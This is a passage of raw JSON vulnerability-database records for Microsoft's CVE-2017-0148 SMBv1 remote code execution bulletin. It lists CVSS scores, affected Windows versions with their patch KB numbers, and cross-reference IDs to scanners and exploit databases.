"KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", 
"kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T08:45:23", "differentElements": ["msAffectedSoftware"], "edition": 70}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": 
{"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T10:55:46", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", 
"PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB3213986", "KB3210721", "KB3177186", "KB4012606", "KB4012217", "KB3212646", "KB4012212", "KB4012214", "KB3205401", "KB4013429", "KB4012215", "KB3205409", "KB4012213", "KBMS16-110, 3187754", "KB4012216", "KB4013198", "KB3210720"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": 
"2021-09-20T10:55:46", "differentElements": ["msAffectedSoftware"], "edition": 71}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "80a0fac71f040ba4d47cf15ded29e9dd", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": 
["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T12:46:46", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 
2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit 
systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based 
Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core 
installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 